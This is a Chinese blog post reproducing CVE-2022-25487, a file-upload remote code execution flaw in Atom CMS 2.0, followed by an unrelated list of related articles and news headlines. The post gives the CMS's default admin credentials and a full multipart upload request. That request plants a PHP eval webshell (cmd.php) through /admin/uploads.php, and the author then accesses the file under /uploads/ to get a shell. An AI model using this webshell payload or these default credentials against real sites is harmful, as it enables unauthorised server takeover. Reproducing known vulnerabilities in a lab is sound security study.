当前位置: 首页 > news >正文

CVE-2022-25487 漏洞复现

漏洞描述:Atom CMS 2.0版本存在远程代码执行漏洞,该漏洞源于/admin/uploads.php 未能正确过滤构造代码段的特殊元素。攻击者可利用该漏洞导致任意代码执行。

其实这就是一个文件上传漏洞罢了。。。。

打开之后,/home路由是个空白

image-20240210064833778

信息搜集:该cms有默认邮箱/密码 alan@alan.com/password,到/admin路由下尝试登录。

image-20240210065002672

Users下有个上传文件功能,可能是上传头像用的。

image-20240210065136974

image-20240210065150788

抓包中无文件上传的内容????(奇奇怪怪)

看了一下,漏洞路由在/admin/uploads.php,直接在界面中点击到不了这个路由。。。。

直接修改刚刚的包吧

image-20240210070630756

直接传php文件,这cms写的真shit

Content-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041





-----------------------------30623082103363803402542706041
Content-Disposition: form-data; name="file"


-----------------------------30623082103363803402542706041
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg


<?php @eval($_POST['cmd']);?>
-----------------------------30623082103363803402542706041--

image-20240210070907146

访问木马存储路由/uploads/1707520195231.phpgetshell

image-20240210071158225

相关文章:

  • 排序算法---计数排序
  • 安全基础~通用漏洞5
  • 【Spring2】从重构HelloWorld看Spring的作用
  • 面试经典150题——最小覆盖子串(困难)
  • 微信小程序(四十一)wechat-http的使用
  • Java解决下降路径最小和
  • C++数据结构与算法——双指针法
  • BatchNorm介绍:卷积神经网络中的BN
  • 鸿蒙系统优缺点,能否作为开发者选择
  • MySQL 基础知识(八)之用户权限管理
  • C#,21根火柴棍问题(21 Matchticks Problem)的算法与源代码
  • Netty Review - NioEventLoopGroup源码解析
  • 《CSS 简易速速上手小册》第4章:视觉美学(2024 最新版)
  • uniapp 开发一个密码管理app
  • Python四级考试笔记
  • 【Linux】vim的基本操作与配置(下)
  • html从零开始9:javaScript简介,语句、标识符,变量,JavaScript引入到文件【搬代码】
  • 高级前端面试题及详解
  • 打印最小公倍数
  • linux安装mysql8且初始化表名忽略大小写
  • 中央网信办部署开展“清朗·整治AI技术滥用”专项行动
  • 俄外长:俄将在不损害伙伴关系前提下发展对美关系
  • 国际锐评:菲律宾“狐假虎威”把戏害的是谁?
  • 绿地控股:今年一季度营业收入356亿元,中高层管理人员带头降薪
  • 药明康德一季度净利增长89%,在手订单增超四成至523亿元
  • 全国电影工作会:聚焦扩大电影国际交流合作,提升全球影响力